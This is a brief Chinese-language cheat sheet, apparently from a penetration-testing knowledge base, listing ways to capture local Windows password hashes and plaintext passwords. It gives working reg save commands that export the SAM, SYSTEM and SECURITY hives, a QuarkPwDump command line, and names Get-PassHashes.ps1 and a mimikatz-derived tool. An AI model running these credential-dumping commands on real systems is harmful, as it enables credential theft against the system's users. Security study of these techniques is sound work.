本机hash+明文抓取

来源:l3m0n 浏览 691 扫码分享 2020-10-04 12:20:47

1、Get-PassHashes.ps1

2、导注册表+本地分析 Win2000和XP需要先提到SYSTEM，03开始直接可以reg save 导出的文件大,效率低,但是安全(测试的时候和QuarkPwDump抓取的hash不一致)

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive

3、QuarkPwDump

QuarkPwDump.exe -dhl -o "c:\1.txt"

4、getpass本地账户明文抓取闪电小子根据mimikatz写的一个内存获取明文密码

当前内容版权归 l3m0n 或其关联方所有，如需对内容或内容相关联开源项目进行关注与资助，请访问 l3m0n .

本文档使用 BookStack 构建